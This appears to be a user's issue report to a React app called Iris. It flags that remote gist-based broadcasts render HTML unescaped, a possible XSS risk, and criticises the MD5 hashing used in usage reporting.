I'd like to start with a clarification: I ignored the issue template as it does not seem to be fit for this kind of issue, and this issue is based off of a couple of observations, as I do not really know how to work with React.

I've been using Iris for a bit of time now, and while setting up a reverse proxy to expose it to my local network "nicely" I've noticed it makes requests towards a gist. Upon further investigation I saw that it is used as a broadcast system. The concern is raised from the anchor in it. Since the anchor did not get escaped (and hence we got a link in the broadcast) it leads me to believe that no XSS prevention is in place. In that case, the broadcast system could be abused by either you or a malicious party that gained control over your account to gather information about the user.

Side note, on the topic of gathering information about the user, MD5 is unacceptable as a hash for any private information, let alone authentication details. Because of MD5 I decided to opt out of the usage reporting program, which I have a hard time calling anonymous. Please switch out the algorithm with something more appropriate (say SHA256, assuming you don't take passwords, and even then SHA256 is not considered password-safe) or stop collecting personal data, leaving in only stuff like stack traces and extremely generic information, such as HTTP status codes.